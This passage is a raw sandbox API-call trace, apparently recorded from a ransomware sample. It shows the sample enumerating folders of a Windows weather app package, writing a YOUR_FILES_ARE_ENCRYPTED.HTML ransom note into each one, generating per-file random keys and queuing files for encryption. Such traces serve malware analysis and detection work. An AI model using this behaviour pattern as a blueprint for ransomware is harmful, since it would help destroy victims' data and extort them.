ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.453] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 0 [0115.453] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0115.453] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0115.453] GetProcessHeap () returned 0x600000 [0115.453] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.454] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.455] CloseHandle (hObject=0x32c) returned 1 [0115.455] GetProcessHeap () returned 0x600000 [0115.455] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.455] GetProcessHeap () returned 0x600000 [0115.455] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.455] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0115.455] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.456] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalState") returned 95 [0115.456] GetProcessHeap () returned 0x600000 [0115.456] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.456] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalState" [0115.456] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalState\\*" [0115.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.456] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.456] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 0 [0115.456] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.456] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0115.456] GetProcessHeap () returned 0x600000 [0115.456] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.457] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.458] CloseHandle (hObject=0x32c) returned 1 [0115.458] GetProcessHeap () returned 0x600000 [0115.458] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.458] GetProcessHeap () returned 0x600000 [0115.458] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.458] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ec095fd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1ec095fd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec095fd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0115.458] StrStrIW (lpFirst="Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.458] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe") returned 135 [0115.458] GetProcessHeap () returned 0x600000 [0115.458] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.458] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe" [0115.458] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\*" [0115.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ec095fd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1ec095fd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec095fd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.460] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ec095fd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1ec095fd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec095fd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.460] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ec095fd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1ec095fd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec55a68, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0115.460] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.460] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore") returned 151 [0115.460] GetProcessHeap () returned 0x600000 [0115.460] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.461] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore" [0115.461] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*" [0115.461] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ec095fd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1ec095fd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec55a68, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0d88, dwReserved1=0x62ecf8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.462] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ec095fd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1ec095fd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec55a68, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0d88, dwReserved1=0x62ecf8, cFileName="..", cAlternateFileName="")) returned 1 [0115.462] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec095fd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1edad144, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1edad144, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x6f0d88, dwReserved1=0x62ecf8, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0115.463] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.463] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 171 [0115.463] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.463] lstrlenW (lpString=".dat") returned 4 [0115.463] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.463] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0115.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\microsoft.bingweather_4.6.169.0_x86__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0115.463] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=32768) returned 1 [0115.463] GetProcessHeap () returned 0x600000 [0115.463] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0115.466] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="1C") returned 2 [0115.466] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="66") returned 2 [0115.466] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="EA") returned 2 [0115.466] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="18") returned 2 [0115.466] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="21") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="CC") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="66") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="AB") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="27") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="6E") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="1B") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="82") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="E1") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="3B") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="70") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="77") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="41") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="D1") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="82") returned 2 [0115.466] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="41") returned 2 [0115.466] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="2F") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="2D") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="C9") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="67") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="65") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="3C") returned 2 [0115.466] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="84") returned 2 [0115.466] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="C1") returned 2 [0115.466] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="0B") returned 2 [0115.467] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="83") returned 2 [0115.467] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="84") returned 2 [0115.467] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="00") returned 2 [0115.467] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0115.467] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.467] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0115.467] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1ec55a68, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1ec55a68, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec55a68, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x6f0d88, dwReserved1=0x62ecf8, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0115.467] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.467] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 176 [0115.467] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.467] lstrlenW (lpString=".LOG1") returned 5 [0115.467] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.467] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1ec55a68, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1ec55a68, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec55a68, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0d88, dwReserved1=0x62ecf8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0115.467] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.467] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 176 [0115.467] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.467] lstrlenW (lpString=".LOG2") returned 5 [0115.468] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.468] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1ec55a68, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1ec55a68, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec55a68, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0d88, dwReserved1=0x62ecf8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0115.468] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.468] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 181 [0115.468] GetProcessHeap () returned 0x600000 [0115.468] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\microsoft.bingweather_4.6.169.0_x86__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.469] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.470] CloseHandle (hObject=0x324) returned 1 [0115.470] GetProcessHeap () returned 0x600000 [0115.470] HeapFree (in: 